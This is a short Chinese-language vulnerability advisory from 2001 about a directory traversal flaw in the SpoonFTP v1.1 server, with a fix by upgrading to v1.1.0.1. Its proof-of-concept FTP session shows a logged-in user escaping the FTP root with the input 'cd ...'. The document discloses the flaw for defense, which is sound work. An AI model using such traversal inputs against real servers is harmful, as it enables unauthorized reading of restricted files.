SpoonFTP 存在目录遍历漏洞发布时间:2001-09-21 更新时间:2001-09-21 严重程度:高 威胁程度:读取受限文件 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 SpoonFTP v1.1详细描述 SpoonFTP是FTP服务程序,你可以在http://www.pi-soft.com/下载。其中存在目录遍历漏洞可以突破FTP ROOT的限制。 测试代码 >ftp localhost Connected to xxxxxxxx.rh.rit.edu. 220 SpoonFTP V1.1 User (xxxxxxxx.rh.rit.edu:(none)): jdog 331 Password required. Password: 230 User logged in, proceed. ftp> pwd 257 "/" is current directory. ftp> cd ... 250 CWD command successful. ftp> pwd 257 "/..." is current directory. ftp> 解决方案 升级到V1.1.0.1 at: http://www.pi-soft.com/spoonftp/sftp.exe 相关信息 |
